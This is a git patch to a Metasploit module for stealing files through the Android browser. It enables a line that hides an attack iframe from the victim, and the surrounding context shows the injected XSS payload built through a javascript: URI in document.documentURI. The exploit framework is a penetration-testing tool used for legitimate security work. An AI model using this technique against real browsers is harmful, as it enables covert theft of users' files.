From 7db3277731f067f6985bfa0c63cc489bf6652711 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Thu, 5 Mar 2015 23:52:29 -0600
Subject: [PATCH] Actually hide the iframe.

---
 modules/auxiliary/gather/android_browser_file_theft.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/android_browser_file_theft.rb b/modules/auxiliary/gather/android_browser_file_theft.rb
index 1ccc8b026a..3c7143e28e 100644
--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary
 
       var brokenFrame = document.createElement('iframe');
       brokenFrame.src = 'http://localhost:100';
-      //brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
+      brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
       brokenFrame.onload = function() {
         brokenFrame.onload = null;
         document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(xss.toString())+')()';